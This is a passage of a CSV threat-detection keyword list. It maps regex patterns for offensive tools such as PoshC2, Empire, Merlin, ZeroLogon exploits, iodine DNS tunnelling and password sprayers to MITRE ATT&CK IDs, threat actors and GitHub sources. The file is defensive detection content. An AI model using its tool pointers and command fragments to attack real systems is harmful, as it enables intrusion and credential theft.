Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","49852" "*Invoke-WMIExec.ps1*",".{0,1000}Invoke\-WMIExec\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49853" "*invoke-wmijspayload*",".{0,1000}invoke\-wmijspayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49854" "*Invoke-WMILM*",".{0,1000}Invoke\-WMILM.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49855" "*Invoke-WMILM.json*",".{0,1000}Invoke\-WMILM\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49856" "*Invoke-WMImplant*",".{0,1000}Invoke\-WMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49857" "*Invoke-WMIObfuscatedPSCommand*",".{0,1000}Invoke\-WMIObfuscatedPSCommand.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49858" "*invoke-wmipayload*",".{0,1000}invoke\-wmipayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49859" "*Invoke-WMIpersist*",".{0,1000}Invoke\-WMIpersist.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","N/A","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z","49860" "*Invoke-WMIpersist.ps1*",".{0,1000}Invoke\-WMIpersist\.ps1.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","1","N/A","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z","49861" "*Invoke-WMIRemoting 
*",".{0,1000}Invoke\-WMIRemoting\s.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","49862" "*Invoke-WMIRemoting*",".{0,1000}Invoke\-WMIRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49863" "*Invoke-WmiShadowCopy*",".{0,1000}Invoke\-WmiShadowCopy.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","49864" "*Invoke-WScriptBypassUAC*",".{0,1000}Invoke\-WScriptBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","49865" "*Invoke-WScriptBypassUAC*",".{0,1000}Invoke\-WScriptBypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-WScriptBypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49866" "*Invoke-WScriptBypassUAC.ps1*",".{0,1000}Invoke\-WScriptBypassUAC\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - 
T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49867" "*Invoke-WscriptElevate*",".{0,1000}Invoke\-WscriptElevate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-WScriptBypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49868" "*Invoke-WsusConfigCheck*",".{0,1000}Invoke\-WsusConfigCheck.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - 
T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49869" "*Invoke-ZeroLogon*",".{0,1000}Invoke\-ZeroLogon.{0,1000}","offensive_tool_keyword","Invoke-ZeroLogon","Zerologon CVE exploitation","T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004","TA0001 - TA0004 - TA0005 - TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/BC-SECURITY/Invoke-ZeroLogon","1","1","N/A","N/A","N/A","3","216","41","2020-10-14T04:42:58Z","2020-09-17T05:01:46Z","49870" "*Invoke-Zerologon*",".{0,1000}Invoke\-Zerologon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49871" "*Invoke-ZeroLogon.ps1*",".{0,1000}Invoke\-ZeroLogon\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is 
used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49872" "*Invoking CreateSvcRpc (by @x86matthew)*",".{0,1000}Invoking\sCreateSvcRpc\s\(by\s\@x86matthew\).{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#content","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","49873" "*Invoking CreateSvcRpc (by @x86matthew*",".{0,1000}Invoking\sCreateSvcRpc\s\(by\s\@x86matthew.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram 
Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","49874" "*io_dirtycow.c*",".{0,1000}io_dirtycow\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","49875" "*io_dirtycow.so*",".{0,1000}io_dirtycow\.so.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","49876" "*iodine -*",".{0,1000}iodine\s\-.{0,1000}","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49879" "*iodine -f *",".{0,1000}iodine\s\-f\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49880" "*iodine IP over DNS tunneling server*",".{0,1000}iodine\sIP\sover\sDNS\stunneling\sserver.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#content #linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49881" "*iodine -v*",".{0,1000}iodine\s\-v.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49882" "*iodined -*",".{0,1000}iodined\s\-.{0,1000}","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49883" "*iodined -c*",".{0,1000}iodined\s\-c.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49884" "*iodined -f *",".{0,1000}iodined\s\-f\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49885" "*iodined -v*",".{0,1000}iodined\s\-v.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49886" "*iodine-latest/*",".{0,1000}iodine\-latest\/.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux #windows","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49887" "*iodine-latest-android.zip*",".{0,1000}iodine\-latest\-android\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49888" "*iodine-latest-win32*",".{0,1000}iodine\-latest\-win32.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49889" "*iodine-latest-windows*",".{0,1000}iodine\-latest\-windows.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49890" "*iodine-server.service*",".{0,1000}iodine\-server\.service.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49891" "*iodinetestingtesting*",".{0,1000}iodinetestingtesting.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49892" "*iomoath/PowerShx*",".{0,1000}iomoath\/PowerShx.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","49894" "*iomoath/SharpSpray*",".{0,1000}iomoath\/SharpSpray.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","49895" "*ionided *",".{0,1000}ionided\s.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","49897" "*ionuttbara/windows-defender-remover*",".{0,1000}ionuttbara\/windows\-defender\-remover.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","49898" "*ios7tojohn.pl*",".{0,1000}ios7tojohn\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","49899" "*iox.exe fwd -r *",".{0,1000}iox\.exe\sfwd\s\-r\s.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","49900" "*IOXIDResolver.py*",".{0,1000}IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - 
